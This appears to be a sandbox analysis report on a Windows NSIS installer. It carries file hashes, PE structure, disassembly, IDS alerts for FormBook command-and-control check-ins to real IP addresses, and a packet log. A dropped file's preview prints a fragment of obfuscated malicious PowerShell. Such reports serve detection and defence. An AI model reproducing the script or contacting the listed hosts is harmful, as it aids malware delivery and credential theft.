                                                                      Preview:.....CC.......VV..........[.................yy.......PPPP.....................................z.........EEE......77..rr.............MM.........t..D.++.......VV...n........U...dddd..}.H........[..```........... .........................3..j.c.............*******...@....(............K.4....aa.........!........55......bbb..........V.....s............6...JJ....................................00..............<<<...........WW....ee.......................Z........w..}}................................m....ddd................................................J........p.AAA..............................OOO.......................}.......&&&....SSSS............................8...MMMM....ppp.................(((...................y...<....88.I..............ff...LL...a.........................uuu.......HHHHH.......S..................^^^^....................1..........................................................GGG.6........+..yyy.}}....GG.........................G..................................
                                                                      Process:C:\Users\user\Desktop\Salmebogs(1).exe
                                                                      File Type:Unicode text, UTF-8 text, with very long lines (4415), with CRLF, LF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):76331
                                                                      Entropy (8bit):5.1363361287083045
                                                                      Encrypted:false
                                                                      SSDEEP:1536:/U6h1M3oDTT0U1w6TdZ1M0pTfC9KDaqGETBqyO9wmvkO:1Vf0U1w6pM0pTqs2+ofwuR
                                                                      MD5:C1373F01F7AC33B18CB1471401BB5E2F
                                                                      SHA1:CD513F52017CF993655CCC29E8036B950F6CE9BA
                                                                      SHA-256:3D8BC0DF3CFB374447D2330DE65A77F07061320C4AF5D309BD17C4EA1EA06FC4
                                                                      SHA-512:CA5A7C50CE658CE6C8E4DFA9CF5A0E0FB883AB711BD5FBE792D482BB1741B7CCB465735C44C868D0AF0054FDD1646AA4FF10BCD1A532A19C3416388D90BFB82A
                                                                      Malicious:true
                                                                      Preview:$Vandplanten=$Lodowic;.....<#Disaccharose Transithandlen Readvocate Driftssystemmer #>..<#Tikroners Mulmul Buffooperas Detailvirksomhederne Semianthropological Vanhelligelsers #>..<#Ny Experimentises Piasaba Tapetbogen Aquilian Prsenterendes Forgnger #>..<#Desserttallerkenernes Stikkelen Aabenlysestes #>..<#recountment Sikkerhedsventilernes Databasesystem #>..<#Blankard Realleksikonets Resinise Solbrune Srkermet #>...$Medlemsskabernes = @'. kanto .Kajakke$Cany nepSlumpakhMilliv oWrenc et helbreoHerlu.dn pagtenoAnemarisEpiste uOp attesBladhanr skarpsvR.fluxeeAddendelMobstetiAlbuersg Jubilu=Thriges$Tal,onsWStartpue Elig bdMetasom;bilopho. ranspafS gnaliuChambranBugfinncblasto tSinklesiStopforoMineri nIncompr M,rgenFEndiablo quellerTonometsHyposynkUdskrivnT.lstediEbbesamn,athorigAmortiseKrysta r.tvningnGuslibaeunlogic federa(Srt,gca$Forh llpSystemahSiderefo eurotitUsynligoSolidarnPecul aotrichonsAn ibiouNightins ,rdist,O.ympia$PlagsomsMilieu.tNormererunderinaContempaSanctiotGen,emskFid
                                                                      Process:C:\Users\user\Desktop\Salmebogs(1).exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):90140
                                                                      Entropy (8bit):1.2562832019802535
                                                                      Encrypted:false
                                                                      SSDEEP:768:Dx0VphnxojoBEFeqJOY2ts7l60O5wIbI+1+ue:V4QnP2PMF
                                                                      MD5:A5B7F2BDC17F9729B28BD7F4080B0622
                                                                      SHA1:824A5D7D34E9A986F6573A3FB23E05C2D025458E
                                                                      SHA-256:E07808B3CA49C3690996E24A303072F34B3368F1B1499431DD75D09DEC26D3B7
                                                                      SHA-512:4EE1F6ACF70EB3F19615C64D76F2A18E5AEBAE9C4F583701675556983676887DCEBF4D2772B91489FCBCE8636BEA713E830CB592C8B6661B163C302ECE1A9674
                                                                      Malicious:false
                                                                      Preview:...............o..........................................................#....."................,................................................................................U.......................................................................)..........M...$...............................U..................................C.....<.................o....................P..........W.................................................w...............................................................m....................................n...........;....................../..................................................................B..................J..........................^..............b..............................N.G...........................5.....................G..........................................................................................................................................................+........................!..#......................T.....q..
                                                                      Process:C:\Users\user\Desktop\Salmebogs(1).exe
                                                                      File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 2147483648.000000
                                                                      Category:dropped
                                                                      Size (bytes):154919
                                                                      Entropy (8bit):1.2463167010571727
                                                                      Encrypted:false
                                                                      SSDEEP:768:GUmOQqZ4NyHCYyn/xI0Q351mtmrvopO7bhJDGnjlDCWOTYeHFYMgWDAFQUvN:GnjtABShTWw
                                                                      MD5:26E9C02B074E229B86C10C9464F87417
                                                                      SHA1:8FEAD9C8B8B1D8329A40824C4ED61F4EB2AAACA3
                                                                      SHA-256:EC501E84F3F8970CF3FC36D6229E933D09FD7C48B5420E836A0BF2CA89EC8305
                                                                      SHA-512:78A1469FF0E82A5B76D3AD4BAAA3B719DFC30F9698C522926642C2DEEF52E2BD07DCA8550E0AFBFB021C8E987EE5BD33105DC3B4FCF3E683D8B6C0163C2099D6
                                                                      Malicious:false
                                                                      Preview:...%.........8...[j..f....................!........}.....................................................JY.E..........................................................................................%...........................;................,.......%..u.j.......................................................P..................................................................L.....................m.........]............................................................|.......................p.........................................../......................................................$.....................................................................t........L................c............*.....i........B....................C.....g................................................................ ............................q...........................................................................................6.............F....................................................
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Entropy (8bit):7.8978229070875745
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:Salmebogs(1).exe
                                                                      File size:552'510 bytes
                                                                      MD5:b5948d19a341bc22c750d129f41a55ae
                                                                      SHA1:d21d67d41f27eca213fb81f2c5d68fdee27d815d
                                                                      SHA256:0f1ec8d7d4cf99bce4bf482009f456a2e210c6d40d22802a196a2151170780ee
                                                                      SHA512:4c0507ec93cc6bc82c718f09628eb9d7694f354ba3ae927effe2eb94b5a2ccfe8fd157fd3cf1bc69fe3b656f11921e83546c013452107c5db4b0fc3d51c8c69c
                                                                      SSDEEP:12288:rqxGbI7E2Rg+JZDFBRTvfN2fhepnatv8JvtHmv:U7E2RDn5BRTvEhepngMvh
                                                                      TLSH:F1C4235836D8ECBBC5B28A328E62AE5909FEEC168D1077431325757F3E7B342C952390
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!@G.@...@...@../Oq..@...@/.J@../Os..@...c...@..+F(..@..Rich.@..........PE..L....{.W.................b....:.....}2............@
                                                                      Icon Hash:9101d81c0d291d01
                                                                      Entrypoint:0x40327d
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x57807BBD [Sat Jul 9 04:21:17 2016 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:e2a592076b17ef8bfb48b7e03965a3fc
                                                                      Instruction
                                                                      sub esp, 000002D4h
                                                                      push ebx
                                                                      push esi
                                                                      push edi
                                                                      push 00000020h
                                                                      pop edi
                                                                      xor ebx, ebx
                                                                      push 00008001h
                                                                      mov dword ptr [esp+14h], ebx
                                                                      mov dword ptr [esp+10h], 0040A2E0h
                                                                      mov dword ptr [esp+1Ch], ebx
                                                                      call dword ptr [004080B0h]
                                                                      call dword ptr [004080ACh]
                                                                      cmp ax, 00000006h
                                                                      je 00007FF93C831D93h
                                                                      push ebx
                                                                      call 00007FF93C834ED4h
                                                                      cmp eax, ebx
                                                                      je 00007FF93C831D89h
                                                                      push 00000C00h
                                                                      call eax
                                                                      mov esi, 004082B8h
                                                                      push esi
                                                                      call 00007FF93C834E4Eh
                                                                      push esi
                                                                      call dword ptr [0040815Ch]
                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                      cmp byte ptr [esi], 00000000h
                                                                      jne 00007FF93C831D6Ch
                                                                      push ebp
                                                                      push 00000009h
                                                                      call 00007FF93C834EA6h
                                                                      push 00000007h
                                                                      call 00007FF93C834E9Fh
                                                                      mov dword ptr [007A8A24h], eax
                                                                      call dword ptr [0040803Ch]
                                                                      push ebx
                                                                      call dword ptr [004082A4h]
                                                                      mov dword ptr [007A8AD8h], eax
                                                                      push ebx
                                                                      lea eax, dword ptr [esp+34h]
                                                                      push 000002B4h
                                                                      push eax
                                                                      push ebx
                                                                      push 0079FEE0h
                                                                      call dword ptr [00408188h]
                                                                      push 0040A2C8h
                                                                      push 007A7A20h
                                                                      call 00007FF93C834A88h
                                                                      call dword ptr [004080A8h]
                                                                      mov ebp, 007B3000h
                                                                      push eax
                                                                      push ebp
                                                                      call 00007FF93C834A76h
                                                                      push ebx
                                                                      call dword ptr [00408174h]
                                                                      add word ptr [eax], 0000h
                                                                      Programming Language:
                                                                      • [EXP] VC++ 6.0 SP5 build 8804
                                                                       Name | Virtual Address | Virtual Size | Is in Section
                                                                       IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
                                                                       IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c5000 | 0x219e0 | .rsrc
                                                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b4 | .rdata
                                                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                       Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                       .text | 0x1000 | 0x6154 | 0x6200 | bde81925c04b8b13a9c5dc11c6cbba5f | False | 0.6732700892857143 | data | 6.479248571798096 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                       .rdata | 0x8000 | 0x13a4 | 0x1400 | 2fd23f25ba6d052f3a4f032544496f73 | False | 0.453125 | data | 5.162313935974215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                       .data | 0xa000 | 0x39eb18 | 0x600 | 769652d049c5b87df2f7a3908b2269c6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                       .ndata | 0x3a9000 | 0x1c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                       .rsrc | 0x3c5000 | 0x219e0 | 0x21a00 | 8b27949d436016483a1692b94b0ec57d | False | 0.8897319354089219 | data | 7.599236344539099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                       Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                       RT_ICON | 0x3c5418 | 0xcdf5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9961688003793266
                                                                       RT_ICON | 0x3d2210 | 0x9016 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9899690939651901
                                                                       RT_ICON | 0x3db228 | 0x4ad3 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9838162359697207
                                                                       RT_ICON | 0x3dfd00 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.4756224066390041
                                                                       RT_ICON | 0x3e22a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5159474671669794
                                                                       RT_ICON | 0x3e3350 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5786247334754797
                                                                       RT_ICON | 0x3e41f8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7134476534296029
                                                                       RT_ICON | 0x3e4aa0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.4121951219512195
                                                                       RT_ICON | 0x3e5108 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.5036127167630058
                                                                       RT_ICON | 0x3e5670 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6445035460992907
                                                                       RT_ICON | 0x3e5ad8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.5026881720430108
                                                                       RT_ICON | 0x3e5dc0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5675675675675675
                                                                       RT_DIALOG | 0x3e5ee8 | 0x100 | data | English | United States | 0.5234375
                                                                       RT_DIALOG | 0x3e5fe8 | 0x11c | data | English | United States | 0.6056338028169014
                                                                       RT_DIALOG | 0x3e6108 | 0xc4 | data | English | United States | 0.5918367346938775
                                                                       RT_DIALOG | 0x3e61d0 | 0x60 | data | English | United States | 0.7291666666666666
                                                                       RT_GROUP_ICON | 0x3e6230 | 0xae | data | English | United States | 0.6091954022988506
                                                                       RT_VERSION | 0x3e62e0 | 0x3bc | data | English | United States | 0.4456066945606695
                                                                       RT_MANIFEST | 0x3e66a0 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
DLL | Import
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-28T10:06:16.974137+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.6 | 49724 | 212.162.149.63 | 80 | TCP
2024-11-28T10:06:46.269126+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49725 | 165.22.38.185 | 80 | TCP
2024-11-28T10:07:03.636386+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49726 | 154.88.22.104 | 80 | TCP
2024-11-28T10:07:06.293028+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49727 | 154.88.22.104 | 80 | TCP
2024-11-28T10:07:09.013613+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49728 | 154.88.22.104 | 80 | TCP
2024-11-28T10:07:11.716882+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49729 | 154.88.22.104 | 80 | TCP
2024-11-28T10:07:18.631747+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49730 | 69.57.163.64 | 80 | TCP
2024-11-28T10:07:21.216527+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49731 | 69.57.163.64 | 80 | TCP
2024-11-28T10:07:23.880318+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49732 | 69.57.163.64 | 80 | TCP
2024-11-28T10:07:26.583828+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49733 | 69.57.163.64 | 80 | TCP
2024-11-28T10:07:33.494131+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49734 | 104.21.6.17 | 80 | TCP
2024-11-28T10:07:36.272383+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49735 | 104.21.6.17 | 80 | TCP
2024-11-28T10:07:39.044925+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49736 | 104.21.6.17 | 80 | TCP
2024-11-28T10:07:41.784656+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49737 | 104.21.6.17 | 80 | TCP
2024-11-28T10:07:48.917661+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49738 | 3.75.10.80 | 80 | TCP
2024-11-28T10:07:51.489229+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49739 | 3.75.10.80 | 80 | TCP
2024-11-28T10:07:54.136331+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49740 | 3.75.10.80 | 80 | TCP
2024-11-28T10:07:56.785215+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49741 | 3.75.10.80 | 80 | TCP
2024-11-28T10:08:04.526932+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49742 | 103.168.172.37 | 80 | TCP
2024-11-28T10:08:06.770860+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49743 | 103.168.172.37 | 80 | TCP
2024-11-28T10:08:09.553131+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49744 | 103.168.172.37 | 80 | TCP
2024-11-28T10:08:12.232707+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49745 | 103.168.172.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                      Nov 28, 2024 10:06:17.634437084 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.637089014 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.637155056 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.637228012 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.637269020 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.640089035 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.640178919 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.640274048 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.640274048 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.642951965 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.643012047 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.643105030 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.643167973 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.644633055 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.644716024 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.644717932 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.644772053 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.646543026 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.646639109 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.646678925 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.646727085 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.648370028 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.648411036 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.648485899 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.648547888 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.650227070 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.650279999 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.650329113 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.650432110 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.652122974 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.652180910 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.652221918 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.652272940 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.654280901 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.654335022 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.654493093 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.654604912 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.655859947 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.655937910 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.655972958 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.656017065 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.657746077 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.657788992 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.657804966 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.657855988 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.659661055 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.659709930 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.659745932 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.659805059 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.661474943 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.661534071 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.661626101 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.661676884 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.663367987 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.663423061 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.663461924 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.663523912 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.665232897 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.665323019 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.665354967 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.665397882 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.667115927 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.667195082 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.667263031 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.667335987 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.668997049 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.669055939 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.669115067 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.669178009 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.670855045 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.670926094 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.670968056 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.671021938 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.672739983 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.672782898 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.672835112 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.672835112 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.674633980 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.674719095 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.674755096 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.674818039 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.676511049 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.676554918 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.676609993 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.676650047 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.678461075 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.678515911 CET4972480192.168.2.6212.162.149.63
